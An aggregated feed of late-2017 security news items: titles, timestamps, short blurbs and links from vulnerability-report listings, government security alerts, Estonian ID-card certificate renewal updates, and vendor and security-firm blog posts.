2017-12-04T14:00:00Z | 1512396000

https://www.akamai.com/blog/performance/2024/aug/dominteractive-measurement
Security Alert (A17-12-01): Multiple Vulnerabilities in Apache Struts
2017-12-04T04:00:00Z | 1512360000

Apache has released a new version of Apache Struts to address multiple vulnerabilities affecting systems that use the Struts REST plugin.

https://www.govcert.gov.hk/en/alerts_detail.php
Uuendatud sertifikaatide arv ületab täna 300 000 piiri
2017-11-27T22:00:00Z | 1511820000

Teisipäeva hommikuse seisuga on oma ID-kaartide sertifikaate uuendanud üle 298 000 inimese, neist ligi 65 000 tegid seda Politsei- ja Piirivalveameti (PPA) teenindustes ja üle 233 000 kauguuendamise teel

https://ria.ee/uudised/uuendatud-sertifikaatide-arv-uletab-tana-300-000-piiri
The Mobile Access Revolution: Visibility and Performance Remain a Challenge
2017-11-27T15:17:12Z | 1511795832

If mobile VPN seems a persistent pain in the-you-know-where, you’re not alone. At our recent webinar “Mobile Access Revolution: The End of Slow VPN and Users’ Complaints,” Adrian Dunne, global IT director at AdRoll, a leading ad tech company, and Ofir Agasi, our director of product marketing, analyzed the challenges posed by mobile users and... The post The Mobile Access Revolution: Visibility and Performance Remain a Challenge appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-mobile-access-revolution-visibility-and-performance-remain-a-challenge/
How-To: Replaying Cellular Network Characteristics on Cloud Infrastructure
2017-11-27T14:00:00Z | 1511791200

https://www.akamai.com/blog/cloud/2024/aug/replaying-cellular-network-characteristics-on-cloud-infrastructure
Towards efficient cyber resilience
2017-11-27T10:00:00Z | 1511776800

As the internet becomes imorteant in every more areas of our daily lifes ways need to be found to ensure resilience. The by far most important to achieve cyber resilience is collaboration across boarders.

https://www.first.org/blog/20171127_Resilience
Securing Ethereum at Empire Hacking
2017-11-22T12:50:31Z | 1511355031

If you’re building real applications with blockchain technology and are worried about security, consider this meetup essential. Join us on December 12th for a special edition of Empire Hacking focused entirely on the security of Ethereum. Why attend? Four blockchain security experts will be sharing how to write secure smart contracts, and hack them. Two […]

https://blog.trailofbits.com/2017/11/22/securing-ethereum-at-empire-hacking/
Security Alert (A17-11-05): Multiple Vulnerabilities in Intel Products
2017-11-22T04:00:00Z | 1511323200

Intel has published a security advisory to address multiple vulnerabilities in Intel manageability products with the objective of enhancing firmware resilience.

https://www.govcert.gov.hk/en/alerts_detail.php
Why NFV is Long on Hype, Short on Value
2017-11-21T11:20:17Z | 1511263217

Network Function Virtualization (NFV) is an emerging platform to deliver network and security functions as a managed service. Network service providers (NSPs) have been piloting, and in some cases offering, NFV solutions to enterprises. At the core of NFV is the notion that network functions, such as SD-WAN, firewalling and secure web access, can be... The post Why NFV is Long on Hype, Short on Value appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-nfv-is-long-on-hype-short-on-value/
Üle kolmandiku turvariskiga ID-kaartidest on ära uuendatud
2017-11-20T22:00:00Z | 1511215200

Esmaspäeva hilisõhtu seisuga on ID-kaardi uuendanud üle 272 000 inimese, mis on üle kolmandiku kõigist turvariskiga ID-kaartidest.

https://ria.ee/uudised/ule-kolmandiku-turvariskiga-id-kaartidest-ara-uuendatud
Tinysvcmdns Multi-label DNS Heap Overflow Vulnerability
2017-11-20T00:00:00Z | 1511136000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0439
The Future of Enterprise Networking : What Do The Experts Say About SD-WAN
2017-11-19T09:53:56Z | 1511085236

Enterprise networking experts often disagree on many things. However, when it comes to SD-WAN technology it is difficult to ignore its obvious benefits.  Don’t take our word for it, here’s what 9 leading industry experts have to say on the benefits of SD-WAN for enterprise networking: Is SD-WAN the future of networking? Here is what... The post The Future of Enterprise Networking : What Do The Experts Say About SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-future-of-enterprise-networking-what-do-the-experts-say-about-sd-wan/
FIRST and OASIS to host Borderless Cyber Conference and Technical Symposium
2017-11-19T00:00:00Z | 1511049600

Event to take place at the Prague Marriott on 6-8 December 2017

https://www.first.org/newsroom/releases/20171119
PPA: PPA aitab nädalavahetusel ID-kaarte uuendada kaubanduskeskustes üle Eesti
2017-11-15T22:00:00Z | 1510783200

Sel nädalavahetusel aitavad Politsei- ja Piirivalveameti (PPA) töötajad ajutistes teeninduspunktides kaubanduskeskustes üle Eesti neid ID-kaartide kasutajaid, kes vajavad abi sertifikaatide uuendamisel.

https://ria.ee/uudised/ppa-ppa-aitab-nadalavahetusel-id-kaarte-uuendada-kaubanduskeskustes-ule-eesti
The business case for SD-WAN: Because MPLS is Not Fit for the Cloud
2017-11-15T14:37:21Z | 1510756641

If there is one thing crucial to remain competitive in today’s global marketplace, its connectivity. As critical business applications are moving to the cloud and with the wide adoption of SaaS and mobile applications in the workplace, connectivity becomes a crucial business asset with the direct effect on the bottom line. The pressure is on... The post The business case for SD-WAN: Because MPLS is Not Fit for the Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-business-case-for-sd-wan-because-mpls-is-not-fit-for-the-cloud/
Security Alert (A17-11-02): Multiple Vulnerabilities in Microsoft Products (November 2017)
2017-11-15T04:00:00Z | 1510718400

Microsoft has released 50 security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-11-03): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2017-11-15T04:00:00Z | 1510718400

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-11-04): Multiple Vulnerabilities in Firefox
2017-11-15T04:00:00Z | 1510718400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
libxls xls_preparseWorkSheet MULRK Code Execution Vulnerability
2017-11-15T00:00:00Z | 1510704000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0461
libxls xls_mergedCells Code Execution Vulnerability
2017-11-15T00:00:00Z | 1510704000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0403
libxls read_MSAT Code Execution Vulnerability
2017-11-15T00:00:00Z | 1510704000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0404
libxls xls_addCell Formula Code Execution Vulnerability
2017-11-15T00:00:00Z | 1510704000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0463
libxls xls_preparseWorkSheet MULBLANK Code Execution Vulnerability
2017-11-15T00:00:00Z | 1510704000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0460
libxls xls_getfcell Code Execution Vulnerability
2017-11-15T00:00:00Z | 1510704000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0426
libxls xls_appendSST Code Execution Vulnerability
2017-11-15T00:00:00Z | 1510704000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0462
Adobe Acrobat Reader DC PDF Structured Hierarchy ActualText Structure Element Remote Code Execution Vulnerability
2017-11-14T00:00:00Z | 1510617600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0356
Aktiivsed ID-kaardi kasutajad on kaardi ära uuendanud
2017-11-13T22:00:00Z | 1510610400

Tänase seisuga on ID-kaardi uuendanud 232 000 inimest, neist peaaegu 188 000 arvuti vahendusel ja 44 000 Politsei- ja Piirivalveameti teenindustes.

https://ria.ee/uudised/aktiivsed-id-kaardi-kasutajad-kaardi-ara-uuendanud
Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0000 Information Disclosure Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0381
Foscam IP Video Camera webService dyndns.com DDNS Client Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0359
Foscam IP Video Camera CGIProxy.fcgi SoftAP Configuration Command Injection Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0380
Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0002 Username Field Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0382
Foscam IP Video Camera devMng Multi-Camera Port 10001 Command 0x0064 Empty AuthResetKey Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0384
Foscam IP Video Camera CGIProxy.fcgi logOut Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0385
Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0357
Foscam IP Video Camera webService 9299.org DDNS Client Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0360
Foscam IP Video Camera webService 3322.net DDNS Client Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0358
Foscam IP Video Camera CGIProxy.fcgi Firmware Upgrade Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0379
Foscam IP Video Camera UPnP Discovery Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0386
Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0002 Password Field Code Execution Vulnerability
2017-11-13T00:00:00Z | 1510531200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0383
Exploiting Directory Traversal to View Customer Credit Card Information on Yahoo's Small Business Platform
2017-11-10T00:00:00Z | 1510272000

The Yahoo small business platform was storing user information in a set of directories that were protected simply by obscurity. The attacker, with knowledge of the victims email, could run an wordlist against a very predictable/guessable service ID and receive information from the response in order to view the victims payment information.

https://samcurry.net/exploiting-directory-traversal-on-a-yahoo-acquisition
How are teams currently using osquery?
2017-11-09T13:10:26Z | 1510233026

In the year since we ported osquery to Windows, the operating system instrumentation and endpoint monitoring agent has attracted a great deal of attention in the open-source community and beyond. In fact, it recently received the 2017 O’Reilly Defender Award for best project. Many large and leading tech firms have deployed osquery to do totally […]

https://blog.trailofbits.com/2017/11/09/how-are-teams-currently-using-osquery/
libxls xls_addCell MulBlank Code Execution Vulnerability
2017-11-09T00:00:00Z | 1510185600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0417
FIRST announces Incident Response training for Policymakers
2017-11-08T14:00:00Z | 1510149600

The Forum of Incident Response and Security Teams announces a training session on cyber security incident response for policymakers, policy analysts and government officials.

https://www.first.org/newsroom/releases/20171108
Mobile Access: How to End Slow Mobile VPNs
2017-11-08T09:28:58Z | 1510133338

User complaints about slow VPN access have been with us forever. Mobile users struggle to gain global access to business applications using legacy mobile VPN clients. They rely on the slow public internet, with its convoluted global routing and high packet loss. Traditional VPN architectures are also incompatible with cloud datacenters in services, such as Amazon... The post Mobile Access: How to End Slow Mobile VPNs appeared first on Cato Networks.

https://www.catonetworks.com/blog/mobile-access-how-to-end-slow-mobile-vpns/
Vananenud operatsioonisüsteemid võivad ID-kaardi lukustada
2017-11-07T22:00:00Z | 1510092000

ID-kaardi uuendamise tagasiside näitab, et osa inimestest kasutavad iganenud operatsioonisüsteeme, kus puuduvad vajalikud turvapaigad ning mis ei pruugi toetada uuendatud sertifikaatidega ID-kaarti. Halvemal juhul võib vananenud operatsioonisüsteemide kasutamine kaardi lukustada.

https://ria.ee/uudised/vananenud-operatsioonisusteemid-voivad-id-kaardi-lukustada
Tänaseks on ID-kaardi uuendanud 150 000 inimest
2017-11-06T22:00:00Z | 1510005600

Täna õhtuse seisuga on oma ID-kaardi uuendanud 150 000 inimest.

https://ria.ee/uudised/tanaseks-id-kaardi-uuendanud-150-000-inimest
Hands on the Ethernaut CTF
2017-11-06T19:32:19Z | 1509996739

Last week Zeppelin released their Ethereum CTF, Ethernaut. This CTF is a good introduction to discover how to interact with a blockchain and learn the basics of the smart contract vulnerabilities. The CTF is hosted on the ropsten blockchain, and you can receive free ethers for it. The browser developer console is used to interact […]

https://blog.trailofbits.com/2017/11/06/hands-on-the-ethernaut-ctf/
Behind the scenes at the FIRST-tech team
2017-11-06T16:00:00Z | 1509984000

The FIRST tech team is re-working a lot of things behind the scenes. Some insights from the frontier.

https://www.first.org/blog/20171107-new-CA
The VMware VeloCloud acquisition and the battle for the future of network services
2017-11-06T10:54:04Z | 1509965644

The acquisition of VeloCloud Networks by VMware closely follows the acquisition of Viptela by Cisco few months ago. In this post, I want to touch on the drivers for this acquisition given the apparent success of VeloCloud with service providers, and what it implies about the role legacy service providers will play in the future... The post The VMware VeloCloud acquisition and the battle for the future of network services appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-vmware-velocloud-acquisition-and-the-battle-for-the-future-of-network-services/
Uuendatud on 120 000 ID-kaarti
2017-11-05T22:00:00Z | 1509919200

Täna õhtuse seisuga on uuendatud 120 000 ID-kaardi sertifikaati, viimase ööpäeva jooksul on uuendusi olnud 18 000.

https://ria.ee/uudised/uuendatud-120-000-id-kaarti
PPA: ID-kaardi on uuendanud 86 000 inimest
2017-11-04T22:00:00Z | 1509832800

Pühapäeva, 5. novembri hommikuks oli ID-kaarti kokku uuendanud 86 000 inimest. Täna ei ole Politsei- ja Piirivalveameti (PPA) teenindustes ega kauguuendamisel suuremaid tõrkeid esinenud. Inimesed, kes peavad ID-kaarti vältimatult kasutama oma igapäevatöös, saavad peatatud ID-kaardi sertifikaate kauguuendada või minna täna kella 15ni avatud PPA teenindustesse.

https://ria.ee/uudised/ppa-id-kaardi-uuendanud-86-000-inimest
Oma ID-kaardi on uuendanud ligi 70 000 inimest
2017-11-03T22:00:00Z | 1509746400

Turvariskiga uuendamata ID-kaartide kaitsmiseks peatati täna südaöösel 730 000 ID-kaardi sertifikaadid. Kümne päevaga õnnestus ID-kaart uuendada ligi 70 000 inimesel. Praeguseks ei ole võimalik enam selle turvanõrkuse tõttu ühegi inimese identiteeti varastada.

https://ria.ee/uudised/oma-id-kaardi-uuendanud-ligi-70-000-inimest
PPA avab ID-kaardi uuendajate jaoks nädalavahetusel kõik PPA teenindused üle Eesti
2017-11-02T22:00:00Z | 1509660000

Nädalavahetusel toimub Politsei- ja Piirivalveameti (PPA) teenindustes vaid ID-kaardi sertifikaatide uuendamine, mobiil-ID aktiveerimine ja dokumentide väljastamine.

https://ria.ee/uudised/ppa-avab-id-kaardi-uuendajate-jaoks-nadalavahetusel-koik-ppa-teenindused-ule-eesti
Täna keskpäevast saavad kauguuendada need inimesed, kelle töövahend on ID-kaart
2017-11-02T22:00:00Z | 1509660000

Täna keskpäevast kuni esmaspäeva, 6. novembri hommikuni on kauguuendamine võimaldatud ainult nendele inimestele, kelle töövahend on ID-kaart: eelkõige meditsiini-, pääste-, kohtu- ja julgeolekuvaldkonnas töötavad inimesed ning need, kes kasutavad oma ID-kaarti iga päev. Need inimesed saavad selle kohta ka otseteavituse.

https://ria.ee/uudised/tana-keskpaevast-saavad-kauguuendada-need-inimesed-kelle-toovahend-id-kaart
ID-kaartide uuendamise seis
2017-11-01T22:00:00Z | 1509573600

2. novembri 2017 kella 8.00 seisuga on kaarte kokku uuendanud 35 000 inimest.

https://ria.ee/uudised/id-kaartide-uuendamise-seis
Vabariigi Valitsus: Eesti peatab ligi 760 000 ID-kaardi sertifikaadid 3. novembri õhtust
2017-11-01T22:00:00Z | 1509573600

Stenbocki maja, 2. november 2017 – Valitsus toetas tänasel kabinetinõupidamisel PPA ja RIA ettepanekut peatada turvariskiga ID-kaartide sertifikaadid 3. novembri õhtul kell 24.00. Kõik ID-kaardid jäävad toimima isikut tõendava dokumendina. Peatatud sertifikaatidega ID-kaarte saab jätkuvalt uuendada politsei- ja piirivalveameti teenindustes, mis on selleks avatud ka nädalavahetusel, samuti jätkub kauguuendamine.

https://ria.ee/uudised/vabariigi-valitsus-eesti-peatab-ligi-760-000-id-kaardi-sertifikaadid-3-novembri-ohtust
Security Alert (A17-11-01): Multiple Vulnerabilities in Apple iOS
2017-11-01T04:00:00Z | 1509508800

On 31 October 2017, Apple released security updates in its latest iOS version 11.1 to fix 20 vulnerabilities identified in various iOS devices. Multiple attack vectors could be adopted to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Strengthening the community of Incident Response and Security Teams
2017-11-01T02:00:00Z | 1509501600

Recent updates from the Board of Directors about recent activities and an outlook what we are currently working on.

https://www.first.org/blog/20171030_Strengthen_Community
Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0420
Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0429
Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0428
Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0402
Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0416
Circle with Disney WiFi Security Downgrade Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0448
Circle with Disney Token Routing Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0437
Circle with Disney configure.xml Notifications Command Injection Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0424
Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0422
Circle with Disney Goclient SSL TLD MITM Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0419
Circle with Disney Firmware Update Signature Check Bypass Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0405
Circle with Disney Apid Server Fork Denial of Service Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0396
Circle with Disney Restore API Command Injection Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0397
Cesanta Mongoose HTTP Server CGI Remote Code Execcution Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0398
Cesanta Mongoose MQTT Payload Length Remote Code Execution
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0399
Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0400
Circle with Disney check_circleservers Code Execution Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0389
Circle with Disney Apid Photo Upload Denial of Service Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0391
Circle with Disney Configuration Restore Photos File Overwrite Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0423
Circle with Disney Rclient SSL TLD MITM Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0418
Circle with Disney Apid Strstr Authentication Bypass Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0421
Circle with Disney Database Updater Code Execution Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0390
Circle with Disney check_torlist.sh Update Code Execution Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0388
Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0401
Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0435
Circle with Disney Rclient SSH Persistent Remote Access Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0436
Circle with Disney Backup API Command Injection Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0372
Circle with Disney Firmware Update Command Injection Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0371
Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0446
Circle with Disney Weak Authentication Vulnerability
2017-10-31T00:00:00Z | 1509408000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0370
RIA: uuendage turvariskiga ID-kaarte
2017-10-30T22:00:00Z | 1509400800

Riigi Infosüsteemi Amet (RIA) soovitab kõigil turvariskiga ID-kaardi omanikel hakata kaarti kauguuendama. Uuendamise tarkvara on testperioodi läbinud ning enamik e-teenuseid juba toetab uuendatud ID-kaarti.

https://ria.ee/uudised/ria-uuendage-turvariskiga-id-kaarte
How a Retailer Built an SD-WAN Across 100+ Stores: A Customer Case Study
2017-10-30T09:12:48Z | 1509354768

Like many retailers, Pet Lovers needed an effective way to secure its stores and franchises. The spread of massive ransomware outbreaks, such as NotPetya, made firewalling particularly important. Pet Lovers had already connected and secured traffic between stores with an Internet-based, virtual private network (VPN). Routers at every store directed point-of-sale (POS) traffic across the... The post How a Retailer Built an SD-WAN Across 100+ Stores: A Customer Case Study appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-a-retailer-built-an-sd-wan-across-100-stores-a-case-study/
Computerinsel Photoline PCX Parsing Code Execution Vulnerability
2017-10-30T00:00:00Z | 1509321600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0459
4 Ways to Secure Your Cloud Datacenter
2017-10-28T10:21:24Z | 1509186084

If your company is like most, it’s probably at least considering connecting a cloud datacenter to the WAN.  Research  shows that as of the end of last year, 90% of surveyed companies were using cloud services with 57% claiming hybrid cloud deployments.   But before you can unleash the power of Amazon AWS, Microsoft Azure,... The post 4 Ways to Secure Your Cloud Datacenter appeared first on Cato Networks.

https://www.catonetworks.com/blog/4-ways-to-secure-your-cloud-datacenter/
How Alewijnse used SD-WAN Connectivity as an MPLS Alternative: A In-depth Profile
2017-10-26T09:59:14Z | 1509011954

As the company grew, Alewijnse found MPLS connectivity to be increasingly unable meet its business requirements. The Dutch engineering company had built a global wide area network (WAN) out of MPLS and Internet services connecting 17 locations — 14 in Europe and 3 in the Asia Pacific — with about 800 mobile and field employees.... The post How Alewijnse used SD-WAN Connectivity as an MPLS Alternative: A In-depth Profile appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-alewijnse-used-sd-wan-connectivity-as-an-mpls-alternative-a-in-depth-profile/
Apache OpenOffice DOC ImportOldFormatStyles Code Execution Vulnerability
2017-10-26T00:00:00Z | 1508976000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0301
Apache OpenOffice DOC WW8Fonts Constructor Code Execution Vulnerability
2017-10-26T00:00:00Z | 1508976000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0295
Apache OpenOffice PPT PPTStyleSheet nLevel Code Execution Vulnerability
2017-10-26T00:00:00Z | 1508976000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0300
E-teenused valmistuvad ID-kaardi uuendamiseks
2017-10-25T21:00:00Z | 1508965200

Riigi Infosüsteemi Ameti (RIA) ja partnerite koostöös on valminud turvariskiga ID-kaartide uuendamiseks tarkvara. Olulisemad e-teenused peaksid oma uuendustega valmis saama järgmisel nädalal, kui on kavas hakata inimesi üles kutsuma oma kaarte uuendama.

https://ria.ee/uudised/e-teenused-valmistuvad-id-kaardi-uuendamiseks
Tähelepanu – kui kasutad ID-kaarti tööks
2017-10-24T21:00:00Z | 1508878800

Tervishoiutöötajatel palume võimalike tõrgete vältimiseks ID-kaarti hetkel mitte uuendada! Teistel palume veenduda enne uuendamist, et tööks vajalikud infosüsteemid toetavad uuendatud ID-kaarti. Küsi selle kohta lisainfot kindlasti oma tööandjalt või IT-toelt

https://ria.ee/uudised/tahelepanu-kui-kasutad-id-kaarti-tooks
Can SD-WAN Services Meet the 6 Promises of SD-WAN?
2017-10-19T16:43:16Z | 1508431396

Like so many areas of IT, networking was revolutionized by SD-WAN, which is now being delivered as a service. But with so many of the same services providers offering who delivered expensive and complex MPLS connectivity now providing SD-WAN connectivity, determining if an SD-WAN service will meet your requirements can be difficult. Join our upcoming... The post Can SD-WAN Services Meet the 6 Promises of SD-WAN? appeared first on Cato Networks.

https://www.catonetworks.com/blog/can-sd-wan-services-meet-the-6-promises-of-sd-wan/
Trail of Bits joins the Enterprise Ethereum Alliance
2017-10-19T11:50:38Z | 1508413838

We’re proud to announce that Trail of Bits has joined the Enterprise Ethereum Alliance (EEA), the world’s largest open source blockchain initiative. As the first information security company to join, and currently one of the industry’s top smart contract auditors, we’re excited to contribute our unparalleled expertise to the EEA. As companies begin to re-architect […]

https://blog.trailofbits.com/2017/10/19/trail-of-bits-joins-the-enterprise-ethereum-alliance/
Training in emerging nations: Laying the seed to close the digital divide
2017-10-19T10:00:00Z | 1508407200

For the longest time the growing Internet and digital communication was hailed as the path to a new and better world. But poorer countries where mostly left out from the benefits. Serge Droz writes about how FIRST delivers training in these regions.

https://www.first.org/blog/20171017-Serge_Droz_education
Google PDFium TIFF Image Flate Decoder Code Execution Vulnerability
2017-10-19T00:00:00Z | 1508371200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0432
IoT Security Best Practices
2017-10-18T07:28:30Z | 1508311710

It’s no secret that IoT security is a problem. That’s why there are so many regulations and initiatives aimed at fixing the issue. But even with the right measures in place, networking professionals still need to be careful how they deploy IoT.   To those ends, a number of best practices have been published to... The post IoT Security Best Practices appeared first on Cato Networks.

https://www.catonetworks.com/blog/iot-security-best-practices/
Security Alert (A17-10-06): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2017)
2017-10-18T04:00:00Z | 1508299200

Oracle has released Critical Patch Update Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
IoT Security Standards and Initiatives
2017-10-17T15:56:52Z | 1508255812

It’s no secret that there are significant concerns with Internet of Things (IoT) security. The concerns stem in part from several high-profile incidents. Late last year, for example, attackers exploited a vulnerability in a brand of IoT cameras to launch a DDoS attack on the website of security expert Brian Krebs. The following month, the... The post IoT Security Standards and Initiatives appeared first on Cato Networks.

https://www.catonetworks.com/blog/iot-security-standards-and-initiatives/
Security Alert (A17-10-04): Multiple Vulnerabilities in WPA2
2017-10-17T04:00:00Z | 1508212800

Multiple vulnerabilities are found in WPA2 encryption protocol for Wi-Fi. An attacker within range of a Wi-Fi network access point and client may be exploited by hackers using the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-10-05): Vulnerability in Adobe Flash Player
2017-10-17T04:00:00Z | 1508212800

Security update is released for Adobe Flash Player to address vulnerability caused by type confusion.

https://www.govcert.gov.hk/en/alerts_detail.php
Our team is growing
2017-10-16T11:50:25Z | 1508154625

We’ve added five more to our ranks in the last two months, bringing our total size to 32 employees. Their resumes feature words and acronyms like ‘CTO,’ ‘Co-founder’ and ‘Editor.’ You might recognize their names from publications and presentations that advance the field. We’re excited to offer them a place where they can dig deeper […]

https://blog.trailofbits.com/2017/10/16/our-team-is-growing/
Tšehhi teadlaste töö kokkuvõttes Eesti ID-kaardi kohta uut infot ei ole
2017-10-15T21:00:00Z | 1508101200

Täna pärastlõunal avaldasid Tšehhi teadlased kokkuvõtte oma uurimistööst, milles kirjeldatakse ühe tootja kiibi turvariskiga seonduvat. Teadustöö kokkuvõttes ei ole uut infot, vaid see täpsustab tehnilise haavatavuse sisu ja mõju, mida RIA, PPA ja MKM tutvustasid Eesti avalikkusele septembri alguses.

https://ria.ee/uudised/tsehhi-teadlaste-too-kokkuvottes-eesti-id-kaardi-kohta-uut-infot-ei-ole
iOS jailbreak detection toolkit now available
2017-10-12T11:50:22Z | 1507809022

We now offer a library for developers to check if their apps are running on jailbroken phones. It includes the most comprehensive checks in the industry and it is App Store compatible. Contact us now to license the iVerify security library for your app. Jailbreaks threaten your work Users like to install jailbreaks on their […]

https://blog.trailofbits.com/2017/10/12/ios-jailbreak-detection-toolkit-now-available/
Security Alert (A17-10-03): Multiple Vulnerabilities in Microsoft Products (October 2017)
2017-10-11T04:00:00Z | 1507694400

Microsoft has released 50 security updates addressing multiple vulnerabilities which affect several Microsoft products or components

https://www.govcert.gov.hk/en/alerts_detail.php
Tracking a stolen code-signing certificate with osquery
2017-10-10T12:53:35Z | 1507640015

Recently, 2.27 million computers running Windows were infected with malware signed with a stolen certificate from the creators of a popular app called CCleaner, and inserted into its software update mechanism. Fortunately, signed malware is now simple to detect with osquery thanks to a pull request submitted by our colleague Alessandro Gario that adds Windows […]

https://blog.trailofbits.com/2017/10/10/tracking-a-stolen-code-signing-certificate-with-osquery/
Simple DirectMedia Layer Create RGB Surface Code Execution Vulnerability
